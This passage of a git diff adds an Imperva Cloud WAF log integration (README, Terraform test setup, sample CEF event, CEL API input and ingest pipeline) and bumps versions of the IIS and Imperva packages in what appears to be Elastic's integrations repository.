"cc7a42a7-7e5c-4ee5-90f3-972c488b05ee", - "includeInFitToBounds": true, - "joins": [], - "label": "Access map [Logs IIS]", - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "applyForceRefresh": true, - "applyGlobalQuery": true, - "applyGlobalTime": true, - "geoField": "source.geo.location", - "id": "bb680314-5606-4509-ac4f-f1089c1180db", - "indexPatternRefName": "layer_1_source_index_pattern", - "metrics": [ - { - "type": "count" - } - ], - "requestType": "point", - "resolution": "MOST_FINE", - "type": "ES_GEO_GRID" - }, - "style": { - "isTimeAware": true, - "properties": { - "fillColor": { - "options": { - "color": "Yellow to Red", - "colorCategory": "palette_0", - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "type": "ORDINAL" - }, - "type": "DYNAMIC" - }, - "icon": { - "options": { - "value": "marker" - }, - "type": "STATIC" - }, - "iconOrientation": { - "options": { - "orientation": 0 - }, - "type": "STATIC" - }, - "iconSize": { - "options": { - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "maxSize": 18, - "minSize": 7 - }, - "type": "DYNAMIC" - }, - "labelBorderColor": { - "options": { - "color": "#FFFFFF" - }, - "type": "STATIC" - }, - "labelBorderSize": { - "options": { - "size": "SMALL" - } - }, - "labelColor": { - "options": { - "color": "#000000" - }, - "type": "STATIC" - }, - "labelSize": { - "options": { - "size": 14 - }, - "type": "STATIC" - }, - "labelText": { - "options": { - "value": "" - }, - "type": "STATIC" - }, - "lineColor": { - "options": { - "color": "#3d3d3d" - }, - "type": "STATIC" - }, - "lineWidth": { - "options": { - "size": 1 - }, - "type": "STATIC" - }, - "symbolizeAs": { - "options": { - "value": "circle" - } - } - }, - "type": "VECTOR" - }, - "type": "GEOJSON_VECTOR", - "visible": true - } - ], - "mapStateJSON": { - "center": { - "lat": 19.94277, - "lon": 0 - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "refreshConfig": { - "interval": 0, - "isPaused": true - }, - "settings": { - "autoFitToDataBounds": false, - "backgroundColor": "#ffffff", - "browserLocation": { - "zoom": 2 - }, - "disableInteractive": false, - "disableTooltipControl": false, - "fixedLocation": { - "lat": 0, - "lon": 0, - "zoom": 2 - }, - "hideLayerControl": false, - "hideToolbarOverlay": false, - "hideViewControl": false, - "initialLocation": "LAST_SAVED_LOCATION", - "maxZoom": 24, - "minZoom": 0, - "showScaleControl": false, - "showSpatialFilters": true, - "showTimesliderToggleButton": true, - "spatialFiltersAlpa": 0.3, - "spatialFiltersFillColor": "#DA8B45", - "spatialFiltersLineColor": "#DA8B45" - }, - "timeFilters": { - "from": "now-15m", - "to": "now" - }, - "zoom": 1.58 - }, - "title": "Access map", - "uiStateJSON": { - "isLayerTOCOpen": true, - "openTOCDetails": [] - } - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-0ac17980-e1d8-11ec-baf0-970634a1784d", - "migrationVersion": { - "map": "8.4.0" - }, - "references": [ - { - "id": "logs-*", - "name": "layer_1_source_index_pattern", - "type": "index-pattern" - } - ], - "type": "map" -} \ No newline at end of file diff --git a/packages/iis/manifest.yml b/packages/iis/manifest.yml index 7da448436c9..2850aee4caf 100644 --- a/packages/iis/manifest.yml +++ b/packages/iis/manifest.yml @@ -1,6 +1,6 @@ name: iis title: IIS -version: "1.17.3" +version: "1.17.4" description: Collect logs and metrics from Internet Information Services (IIS) servers with Elastic Agent. type: integration icons: diff --git a/packages/imperva/changelog.yml b/packages/imperva/changelog.yml index 7a1c2d6a1ea..0c57bdd02e8 100644 --- a/packages/imperva/changelog.yml +++ b/packages/imperva/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/imperva/manifest.yml b/packages/imperva/manifest.yml index 8521c6ca96b..d201b15d58b 100644 --- a/packages/imperva/manifest.yml +++ b/packages/imperva/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: imperva title: Imperva -version: "1.0.1" +version: "1.1.0" description: Collect logs from Imperva devices with Elastic Agent. categories: ["network", "security"] type: integration diff --git a/packages/imperva_cloud_waf/_dev/build/build.yml b/packages/imperva_cloud_waf/_dev/build/build.yml new file mode 100644 index 00000000000..71f48ba2a9c --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/build/build.yml @@ -0,0 +1,4 @@ +dependencies: + ecs: + reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/imperva_cloud_waf/_dev/build/docs/README.md b/packages/imperva_cloud_waf/_dev/build/docs/README.md new file mode 100644 index 00000000000..26708cb53d0 --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/build/docs/README.md @@ -0,0 +1,96 @@ +# Imperva Cloud WAF + +Imperva Cloud WAF is a cloud-based application delivery service that includes web security, DDoS protection, CDN, and load balancing. + +## Data streams + +This integration supports ingestion of events from Imperva Cloud WAF, via AWS S3 input or via [Imperva API](https://docs.imperva.com/bundle/cloud-application-security/page/settings/log-integration.htm). + +**Event** is used to retrieve access and security events. See more details in the documentation [here](https://docs.imperva.com/bundle/cloud-application-security/page/more/log-file-structure.htm). + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.10.1**. + +## Setup + +### Steps to setup Amazon S3 Connection(Push Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Amazon S3**. +4. Next, fill in your credentials: + Your S3 Access key, Secret key, and Path, where path is the location of the folder where you want to store the logs. Enter the path in the following format: /. For example: MyBucket/MyIncapsulaLogFolder. +5. Click Test connection to perform a full testing cycle in which a test file will be transferred to your designated folder. The test file does not contain real data, and will be removed by Incapsula when the transfer is complete. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Steps to obtain API URL, API Key and API ID(Pull Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Imperva API**. +4. From this window copy and keep API Key handy, this will be required for further Integration configuration. +5. Copy **API ID** and **Log Server URI**. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Imperva Cloud WAF +3. Click on the "Imperva Cloud WAF" integration from the search results. +4. Click on the "Add Imperva Cloud WAF" button to add the integration. +5. While adding the integration, if you want to collect logs via AWS S3, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - bucket arn + - collect logs via S3 Bucket toggled on + + or if you want to collect logs via AWS SQS, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - queue url + - collect logs via S3 Bucket toggled off + + or if you want to collect logs via API, keep **Collect Imperva Cloud WAF logs via API** toggle on and and then configure following parameters: + - API ID + - API Key + - URL +6. Save the integration. + +**NOTE**: There are other input combination options available for AWS S3 input, please check [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html). + +## Logs Reference + +### Event + +This is the `Event` dataset. + +#### Example + +{{event "event"}} + +{{fields "event"}} diff --git a/packages/imperva_cloud_waf/_dev/deploy/tf/env.yml b/packages/imperva_cloud_waf/_dev/deploy/tf/env.yml new file mode 100644 index 00000000000..aee5f1c5900 --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/deploy/tf/env.yml @@ -0,0 +1,9 @@ +version: '2.3' +services: + terraform: + environment: + - AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID} + - AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY} + - AWS_SESSION_TOKEN=${AWS_SESSION_TOKEN} + - AWS_DEFAULT_PROFILE=${AWS_DEFAULT_PROFILE} + - AWS_REGION=${AWS_REGION:-us-east-1} diff --git a/packages/imperva_cloud_waf/_dev/deploy/tf/files/test-events.log b/packages/imperva_cloud_waf/_dev/deploy/tf/files/test-events.log new file mode 100644 index 00000000000..668c362f5bd --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/deploy/tf/files/test-events.log @@ -0,0 +1,8 @@ +accountId:123456 +configId:12345 +checksum:123ab7746e2c163e9e56d0ec123456 +format:CEF +startTime:1705705619206 +endTime:1705705805378 +|==| +CEF:0|Incapsula|SIEMintegration|1|1|Normal|0| sourceServiceName=site123.abcd.info siteid=1509732 suid=50005477 requestClientApplication=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 deviceFacility=mia ccode=IL tag=www.elvis.com cicode=Rehovot cs7=31.8969 cs7Label=latitude cs8=34.8186 cs8Label=longitude Customer=CEFcustomer123 siteTag=my-site-tag start=1453290121336 request=site123.abcd.info/main.css ref=www.incapsula.com/lama requestmethod=GET cn1=200 app=HTTP deviceExternalID=33411452762204224 in=54 xff=44.44.44.44 cpt=443 src=12.12.12.12 ver=TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 end=1566300670892 additionalReqHeaders=[{"Accept":"*/*"},{"x-v":"1"},{"x-fapi-interaction-id":"10.10.10.10"}] additionalResHeaders=[{"Content-Type":"text/html; charset\=UTF-8"}] diff --git a/packages/imperva_cloud_waf/_dev/deploy/tf/main.tf b/packages/imperva_cloud_waf/_dev/deploy/tf/main.tf new file mode 100644 index 00000000000..95965d7082d --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/deploy/tf/main.tf @@ -0,0 +1,57 @@ +provider "aws" { + region = "us-east-1" + default_tags { + tags = { + environment = var.ENVIRONMENT + repo = var.REPO + branch = var.BRANCH + build = var.BUILD_ID + created_date = var.CREATED_DATE + } + } +} + +resource "aws_s3_bucket" "bucket" { + bucket = "elastic-package-imperva-cloud-waf-bucket-${var.TEST_RUN_ID}" +} + +resource "aws_sqs_queue" "queue" { + name = "elastic-package-imperva-cloud-waf-queue-${var.TEST_RUN_ID}" + policy = < 0 ? + state + : + request("GET", ( state.url + "logs.index")).with({ + "Header":{ + "Authorization": ["Basic "+string(base64(state.user+":"+state.password))], + } + }).do_request().as(resp, bytes(resp.Body).as(body, { + "worklist": ( + has(state.cursor) && has(state.cursor.log_file) && state.cursor.log_file != null + ? + string(body).split(state.cursor.log_file)[1].split("\n").filter(x,x!="").map(x,{"filename":x}) + : + string(body).split("\n").map(x,{"filename":x}) + ), + "next": 0, + })) + ).as(v, v.next < size(v.worklist) ? + ( + request("GET", + state.url+v.worklist[v.next].filename + ).with({ + "Header":{ + "Authorization": ["Basic "+string(base64(state.user + ":" + state.password))], + } + }).do_request().as(resp, bytes(resp.Body).as(body, { + "events": string(body).split("|==|")[1].split("\n").filter(x,x!="").map(x,{"message":x}), + "cursor": { + "log_file": ( + has(state.cursor) && has(state.cursor.log_file) && state.cursor.log_file != null + ? + ( + (v.worklist[v.next].filename).split(".")[0] != (state.cursor.log_file).split(".")[0] ? + v.worklist[v.next].filename + : + state.cursor.log_file + ) + : + v.worklist[v.next].filename + ) + }, + "worklist": (int(v.next)+1) < size(v.worklist) ? v.worklist : [], + "next": (int(v.next)+1) < size(v.worklist) ? (int(v.next)+1) : 0, + "want_more": (int(v.next)+1) < size(v.worklist), + "user": state.user, + "password": state.password + })) + ) + : + { + "events": [], + "want_more": false, + "user": state.user, + "password": state.password, + "cursor": { + "log_file": has(state.cursor) && has(state.cursor.log_file) ? state.cursor.log_file : null + } + } + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +processors: +- rename: + fields: + - {from: "message", to: "event.original"} +- decode_cef: + field: event.original +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/imperva_cloud_waf/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/imperva_cloud_waf/data_stream/event/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..62667194526 --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,643 @@ +--- +description: Pipeline for processing event logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind_alert + value: alert + if: ctx.cef?.name != "Normal" + - set: + field: event.kind + tag: set_event_kind_event + value: event + if: ctx.cef?.name == "Normal" + - set: + field: event.category + tag: set_event_category_web + value: [web] + - set: + field: event.type + tag: set_event_type_info + value: [info] + - fingerprint: + fields: + - file.inode + - event.start + - event.end + tag: fingerprint_processor + target_field: '_id' + ignore_missing: true + - rename: + field: cef.device.event_class_id + tag: rename_device_event_class_id + target_field: imperva_cloud_waf.event.device.event_class_id + ignore_missing: true + - rename: + field: cef.device.product + tag: rename_device_product + target_field: imperva_cloud_waf.event.device.product + ignore_missing: true + - rename: + field: cef.device.vendor + tag: rename_device_vendor + target_field: imperva_cloud_waf.event.device.vendor + ignore_missing: true + - rename: + field: cef.device.version + tag: rename_device_version + target_field: imperva_cloud_waf.event.device.version + ignore_missing: true + - rename: + field: cef.extensions.deviceAction + tag: rename_extensions_deviceAction + target_field: imperva_cloud_waf.event.extensions.action + ignore_missing: true + - lowercase: + field: event.action + tag: lowercase_event_action + ignore_missing: true + - gsub: + field: event.action + pattern: '_' + replacement: '-' + tag: gsub_event_action + ignore_missing: true + on_failure: + - remove: + field: event.action + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - json: + field: cef.extensions.additionalReqHeaders + tag: json_extensions_additionalReqHeaders + target_field: imperva_cloud_waf.event.extensions.additional.req_headers + if: ctx.cef?.extensions?.additionalReqHeaders != null && ctx.cef.extensions.additionalReqHeaders != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - json: + field: cef.extensions.additionalResHeaders + tag: json_extensions_additionalResHeaders + target_field: imperva_cloud_waf.event.extensions.additional.res_headers + if: ctx.cef?.extensions?.additionalResHeaders != null && ctx.cef.extensions.additionalResHeaders != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.applicationProtocol + tag: rename_extensions_applicationProtocol + target_field: imperva_cloud_waf.event.extensions.application_protocol + ignore_missing: true + - lowercase: + field: network.application + tag: lowercase_network_application + ignore_missing: true + - convert: + field: cef.extensions.bytesIn + tag: convert_extensions_bytesIn_to_long + target_field: imperva_cloud_waf.event.extensions.bytes_in + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.ccode + tag: rename_extensions_ccode + target_field: imperva_cloud_waf.event.extensions.ccode + ignore_missing: true + - set: + field: source.geo.country_iso_code + tag: set_source_geo_country_iso_code_from_event_extensions_ccode + copy_from: imperva_cloud_waf.event.extensions.ccode + ignore_empty_value: true + - rename: + field: cef.extensions.cicode + tag: rename_extensions_cicode + target_field: imperva_cloud_waf.event.extensions.cicode + ignore_missing: true + - json: + field: cef.extensions.cs10 + tag: json_extensions_cs10 + target_field: imperva_cloud_waf.event.extensions.cs10 + if: ctx.cef?.extensions?.cs10 != null && ctx.cef.extensions.cs10 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs10Label + tag: rename_extensions_cs10Label + target_field: imperva_cloud_waf.event.extensions.cs10Label + ignore_missing: true + - json: + field: cef.extensions.cs11 + tag: json_extensions_cs11 + target_field: imperva_cloud_waf.event.extensions.cs11 + if: ctx.cef?.extensions?.cs11 != null && ctx.cef.extensions.cs11 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs11Label + tag: rename_extensions_cs11Label + target_field: imperva_cloud_waf.event.extensions.cs11Label + ignore_missing: true + - convert: + field: cef.extensions.cs7 + tag: convert_extensions_cs7_to_double + target_field: imperva_cloud_waf.event.extensions.cs7 + type: double + ignore_missing: true + if: ctx.cef?.extensions?.cs7 != null && ctx.cef.extensions.cs7 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs7Label + tag: rename_extensions_cs7Label + target_field: imperva_cloud_waf.event.extensions.cs7Label + ignore_missing: true + - convert: + field: cef.extensions.cs8 + tag: convert_extensions_cs8_to_double + target_field: imperva_cloud_waf.event.extensions.cs8 + type: double + ignore_missing: true + if: ctx.cef?.extensions?.cs8 != null && ctx.cef.extensions.cs8 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs8Label + tag: rename_extensions_cs8Label + target_field: imperva_cloud_waf.event.extensions.cs8Label + ignore_missing: true + - set: + field: source.geo.location.lat + tag: set_source_geo_location_lat_from_event_extensions_cs7 + copy_from: imperva_cloud_waf.event.extensions.cs7 + ignore_empty_value: true + - set: + field: source.geo.location.lon + tag: set_source_geo_location_lon_from_event_extensions_cs8 + copy_from: imperva_cloud_waf.event.extensions.cs8 + ignore_empty_value: true + - rename: + field: cef.extensions.cs9 + tag: rename_extensions_cs9 + target_field: imperva_cloud_waf.event.extensions.cs9 + ignore_missing: true + - set: + field: rule.name + tag: set_rule_name_from_event_extensions_cs9 + copy_from: imperva_cloud_waf.event.extensions.cs9 + ignore_empty_value: true + - rename: + field: cef.extensions.cs9Label + tag: rename_extensions_cs9Label + target_field: imperva_cloud_waf.event.extensions.cs9Label + ignore_missing: true + - rename: + field: cef.extensions.Customer + tag: rename_extensions_Customer + target_field: imperva_cloud_waf.event.extensions.customer + ignore_missing: true + - rename: + field: cef.extensions.destinationProcessName + tag: rename_extensions_destinationProcessName + target_field: imperva_cloud_waf.event.extensions.destination_process_name + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomNumber1 + tag: rename_extensions_deviceCustomNumber1 + target_field: imperva_cloud_waf.event.extensions.device.custom_number1 + ignore_missing: true + - set: + field: http.response.status_code + tag: set_http_response_status_code_from_event_extensions_device_custom_number1 + copy_from: imperva_cloud_waf.event.extensions.device.custom_number1 + ignore_empty_value: true + - rename: + field: cef.extensions.deviceCustomString1 + tag: rename_extensions_deviceCustomString1 + target_field: imperva_cloud_waf.event.extensions.device.custom_string1 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString1Label + tag: rename_extensions_deviceCustomString1Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string1_label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomString2 + tag: convert_extensions_deviceCustomString2_to_boolean + target_field: imperva_cloud_waf.event.extensions.device.custom_string2 + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString2Label + tag: rename_extensions_deviceCustomString2Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string2_label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomString3 + tag: convert_extensions_deviceCustomString3_to_boolean + target_field: imperva_cloud_waf.event.extensions.device.custom_string3 + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString3Label + tag: rename_extensions_deviceCustomString3Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string3_label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4 + tag: rename_extensions_deviceCustomString4 + target_field: imperva_cloud_waf.event.extensions.device.custom_string4 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4Label + tag: rename_extensions_deviceCustomString4Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string4_label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString5 + tag: rename_extensions_deviceCustomString5 + target_field: imperva_cloud_waf.event.extensions.device.custom_string5 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString5Label + tag: rename_extensions_deviceCustomString5Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string5_label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString6 + tag: rename_extensions_deviceCustomString6 + target_field: imperva_cloud_waf.event.extensions.device.custom_string6 + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString6Label + tag: rename_extensions_deviceCustomString6Label + target_field: imperva_cloud_waf.event.extensions.device.custom_string6_label + ignore_missing: true + - rename: + field: cef.extensions.deviceExternalId + tag: rename_extensions_deviceExternalId + target_field: imperva_cloud_waf.event.extensions.device.externalId + ignore_missing: true + - rename: + field: cef.extensions.deviceFacility + tag: rename_extensions_deviceFacility + target_field: imperva_cloud_waf.event.extensions.device.facility + ignore_missing: true + - date: + field: cef.extensions.endTime + tag: date_extensions_endTime + target_field: imperva_cloud_waf.event.extensions.end_time + formats: + - ISO8601 + if: ctx.cef?.extensions?.endTime != null && ctx.cef.extensions.endTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.filePermission + tag: rename_extensions_filePermission + target_field: imperva_cloud_waf.event.extensions.file.permission + ignore_missing: true + - rename: + field: cef.extensions.fileType + tag: rename_extensions_fileType + target_field: imperva_cloud_waf.event.extensions.file.type + ignore_missing: true + - rename: + field: cef.extensions.fileId + tag: rename_extensions_fileId + target_field: imperva_cloud_waf.event.extensions.file_id + ignore_missing: true + - rename: + field: cef.extensions.postbody + tag: rename_extensions_postbody + target_field: imperva_cloud_waf.event.extensions.postbody + ignore_missing: true + - set: + field: http.request.body.content + tag: set_http_request_body_content_from_event_extensions_postbody + copy_from: imperva_cloud_waf.event.extensions.postbody + ignore_empty_value: true + - rename: + field: cef.extensions.qstr + tag: rename_extensions_qstr + target_field: imperva_cloud_waf.event.extensions.qstr + ignore_missing: true + - uri_parts: + field: url.original + tag: uri_parts_url_original + if: ctx.url?.original != null + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - user_agent: + field: user_agent.original + tag: user_agent_original + if: ctx.user_agent?.original != null + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: url.query + tag: set_url_query_from_event_extensions_qstr + copy_from: imperva_cloud_waf.event.extensions.qstr + ignore_empty_value: true + - rename: + field: cef.extensions.ref + tag: rename_extensions_ref + target_field: imperva_cloud_waf.event.extensions.ref + ignore_missing: true + - rename: + field: cef.extensions.requestClientApplication + tag: rename_extensions_requestClientApplication + target_field: imperva_cloud_waf.event.extensions.request.client_application + ignore_missing: true + - rename: + field: cef.extensions.requestMethod + tag: rename_extensions_requestMethod + target_field: imperva_cloud_waf.event.extensions.request.method + ignore_missing: true + - rename: + field: cef.extensions.requestUrl + tag: rename_extensions_requestUrl + target_field: imperva_cloud_waf.event.extensions.request.url + ignore_missing: true + - convert: + field: cef.extensions.sip + tag: convert_extensions_sip_to_ip + target_field: imperva_cloud_waf.event.extensions.sip + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.sip != null && ctx.cef.extensions.sip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_event_extensions_sip + copy_from: imperva_cloud_waf.event.extensions.sip + ignore_empty_value: true + - append: + field: related.ip + tag: append_destination_ip_into_related_ip + value: '{{{destination.ip}}}' + allow_duplicates: false + if: ctx.destination?.ip != null + - rename: + field: cef.extensions.siteid + tag: rename_extensions_siteid + target_field: imperva_cloud_waf.event.extensions.site.id + ignore_missing: true + - rename: + field: cef.extensions.siteTag + tag: rename_extensions_siteTag + target_field: imperva_cloud_waf.event.extensions.site.tag + ignore_missing: true + - convert: + field: cef.extensions.sourceAddress + tag: convert_extensions_sourceAddress_to_ip + target_field: imperva_cloud_waf.event.extensions.source.address + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.sourceAddress != null && ctx.cef.extensions.sourceAddress != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_event_extensions_source_address_into_related_ip + value: '{{{imperva_cloud_waf.event.extensions.source.address}}}' + allow_duplicates: false + if: ctx.imperva_cloud_waf?.event?.extensions?.source?.address != null + - convert: + field: cef.extensions.sourcePort + tag: convert_extensions_sourcePort_to_long + target_field: imperva_cloud_waf.event.extensions.source.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: source.port + tag: remove_source_port + ignore_missing: true + if: ctx.imperva_cloud_waf?.event?.extensions?.source?.port != null + - set: + field: destination.port + tag: set_destination_port_from_event_extensions_source_port + copy_from: imperva_cloud_waf.event.extensions.source.port + ignore_empty_value: true + - convert: + field: cef.extensions.cpt + tag: convert_extensions_cpt_to_long + target_field: imperva_cloud_waf.event.extensions.cpt + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_event_extensions_cpt + copy_from: imperva_cloud_waf.event.extensions.cpt + ignore_empty_value: true + - rename: + field: cef.extensions.sourceServiceName + tag: rename_extensions_sourceServiceName + target_field: imperva_cloud_waf.event.extensions.source.service_name + ignore_missing: true + - rename: + field: cef.extensions.sourceUserId + tag: rename_extensions_sourceUserId + target_field: imperva_cloud_waf.event.extensions.source.user_id + ignore_missing: true + - append: + field: related.user + tag: append_event_extensions_source_user_id_into_related_user + value: '{{{imperva_cloud_waf.event.extensions.source.user_id}}}' + allow_duplicates: false + if: ctx.imperva_cloud_waf?.event?.extensions?.source?.user_id != null + - date: + field: cef.extensions.startTime + tag: date_extensions_startTime + target_field: imperva_cloud_waf.event.extensions.start_time + formats: + - ISO8601 + if: ctx.cef?.extensions?.startTime != null && ctx.cef.extensions.startTime != '' + on_failure: + - append: + field: error.message + value: 'Processor 